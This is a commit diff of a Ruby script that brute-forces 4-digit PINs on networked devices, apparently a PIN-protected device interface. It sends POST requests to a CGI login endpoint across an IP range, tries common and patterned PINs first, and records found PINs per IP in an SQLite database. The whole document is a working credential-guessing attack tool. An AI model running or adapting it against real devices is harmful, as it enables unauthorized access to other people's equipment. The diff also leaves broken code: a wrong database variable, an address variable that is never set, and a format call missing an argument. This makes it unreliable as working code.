turning into a class, adding a db - it's almost a real project
This commit is contained in:
parent
a6cf118018
commit
3dd7b04e9e
@ -3,8 +3,39 @@
|
|||||||
|
|
||||||
require 'json'
|
require 'json'
|
||||||
require 'net/http'
|
require 'net/http'
|
||||||
|
require 'sequel'
|
||||||
require 'uri'
|
require 'uri'
|
||||||
|
|
||||||
|
class BfLogin
|
||||||
|
|
||||||
|
attr_reader :address, :dbh, :errors, :responses
|
||||||
|
|
||||||
|
def initialize(address)
|
||||||
|
@address = address
|
||||||
|
@errors = Array.new
|
||||||
|
@responses = Array.new
|
||||||
|
|
||||||
|
db = 'bf_login.db'
|
||||||
|
@dbh = Sequel.connect(sprintf('sqlite://%s', db))
|
||||||
|
end
|
||||||
|
|
||||||
|
def initialize_db
|
||||||
|
@db.create_table? :pins do
|
||||||
|
primary_key :id
|
||||||
|
String :ip
|
||||||
|
String :pin
|
||||||
|
Date :created
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def add_pin_to_db(ip, pin)
|
||||||
|
@dbh[:pins].insert(
|
||||||
|
:ip => ip,
|
||||||
|
:pin => pin,
|
||||||
|
:created => Time.now,
|
||||||
|
)
|
||||||
|
end
|
||||||
|
|
||||||
# return a Net::HTTP::Post request suitable for validating +pin+
|
# return a Net::HTTP::Post request suitable for validating +pin+
|
||||||
def get_request(uri, pin)
|
def get_request(uri, pin)
|
||||||
request = Net::HTTP::Post.new(uri.request_uri)
|
request = Net::HTTP::Post.new(uri.request_uri)
|
||||||
@ -33,24 +64,24 @@ def get_request(uri, pin)
|
|||||||
request
|
request
|
||||||
end
|
end
|
||||||
|
|
||||||
# return a Net::HTTP::Response object
|
# return True|False
|
||||||
def check_pin(url, pin)
|
def check_pin(url, pin)
|
||||||
|
|
||||||
uri = URI.parse(url)
|
uri = URI.parse(url)
|
||||||
http = Net::HTTP.new(uri.host, uri.port)
|
http = Net::HTTP.new(uri.host, uri.port)
|
||||||
|
|
||||||
request = get_request(uri, pin)
|
request = get_request(uri, pin)
|
||||||
http.request(request)
|
response = http.request(request)
|
||||||
|
|
||||||
|
# <properties sys.validate-password="0"></properties>
|
||||||
|
response.body.match(/1/) ? true : false
|
||||||
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
## main()
|
## main()
|
||||||
|
|
||||||
address = ARGV.pop
|
|
||||||
errors = Array.new
|
|
||||||
responses = Array.new
|
|
||||||
output = sprintf('%s-logs-%s.%s.%s.json', __FILE__, address, Time.now.to_i, $$)
|
|
||||||
|
|
||||||
if address.nil?
|
if address.nil?
|
||||||
puts sprintf('usage: %s <ipaddress/range>', __FILE__)
|
puts sprintf('usage: %s <ipaddress/range>', __FILE__)
|
||||||
puts sprintf(' %s 192.168.1.42', __FILE__)
|
puts sprintf(' %s 192.168.1.42', __FILE__)
|
||||||
@ -77,7 +108,7 @@ end
|
|||||||
|
|
||||||
prioritized = [1234, 2546, 1739, 9876, 1425, 4152] # commonly used PINs
|
prioritized = [1234, 2546, 1739, 9876, 1425, 4152] # commonly used PINs
|
||||||
|
|
||||||
# TODO come up with way to generate patterns - keys that are nearby
|
# TODO come up with way to generate patterns - keys that are nearby, incremental/decremental ranges
|
||||||
|
|
||||||
# commonly used PINs that follow a pattern
|
# commonly used PINs that follow a pattern
|
||||||
0.upto(9) do |i|
|
0.upto(9) do |i|
|
||||||
@ -93,6 +124,7 @@ pins = [ prioritized, _pins.keys ].flatten # hackery
|
|||||||
|
|
||||||
targets.each do |target|
|
targets.each do |target|
|
||||||
|
|
||||||
|
app = BfLogin.new(target)
|
||||||
url = sprintf('http://%s/cgi-bin/cgiclient.cgi?CGI.RequestProperties=', target)
|
url = sprintf('http://%s/cgi-bin/cgiclient.cgi?CGI.RequestProperties=', target)
|
||||||
puts sprintf('url: [%s]', url)
|
puts sprintf('url: [%s]', url)
|
||||||
|
|
||||||
@ -104,11 +136,11 @@ targets.each do |target|
|
|||||||
puts sprintf(' trying pin[%s]', pin)
|
puts sprintf(' trying pin[%s]', pin)
|
||||||
|
|
||||||
response = check_pin(url, pin)
|
response = check_pin(url, pin)
|
||||||
responses << response
|
responses << { :ip => target, :pin => pin, :results => response }
|
||||||
|
|
||||||
# <properties sys.validate-password="0"></properties>
|
if response
|
||||||
if response.body.match(/1/)
|
app.add_pin_to_db(target, pin)
|
||||||
puts sprintf('INFO: found the pin[%s]', pin)
|
puts sprintf('INFO: found PIN[%s] for [%s]', pin, target)
|
||||||
break
|
break
|
||||||
end
|
end
|
||||||
|
|
||||||
@ -121,12 +153,16 @@ targets.each do |target|
|
|||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
|
||||||
|
|
||||||
# TODO something better here
|
unless errors.empty?
|
||||||
errors.each do |e|
|
errors.each do |e|
|
||||||
puts sprintf('ERROR: pin[%s] trace[%s]', e[:pin], e[:exception])
|
puts sprintf('ERROR: pin[%s] trace[%s]', e[:pin], e[:exception])
|
||||||
end
|
end
|
||||||
|
|
||||||
puts sprintf('ERROR: [%d] total errors', errors.size)
|
puts sprintf('ERROR: [%d] total errors', errors.size)
|
||||||
exit 1 unless errors.empty?
|
else
|
||||||
|
# TODO this is going to get lost in the console output when running against multiple targets -- should we stop printing the PINs attempted?
|
||||||
|
puts sprintf('tested[%s] PINs, found correct one[%s]', responses.size, )
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
Loading…
Reference in New Issue
Block a user